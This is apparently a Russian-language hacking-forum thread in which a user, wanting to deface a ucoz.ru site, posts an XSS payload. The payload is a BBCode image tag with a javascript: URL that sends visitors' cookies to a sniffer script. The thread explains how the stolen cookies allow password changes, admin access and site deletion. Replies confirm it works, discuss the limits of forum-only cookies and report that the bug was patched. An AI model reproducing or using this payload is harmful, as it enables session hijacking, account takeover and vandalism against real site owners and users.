|
ucoz.ru
Просто была необходимость задефейсить один сайтик на укоз.ру
[img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img] Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт. |
Спасибо огромное. Всё работает!
Кстати, никто не знает...каким образом шифруется там пароль... p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса. Либо я чего - то не понимаю? |
При замене своих кук полученными,не заходит Админом :(
|
Заходит, но только на форум(у меня покрайне мере так ?
А что менял? Какие значения? |
Багу прикрыли :(
|
| Время: 04:05 |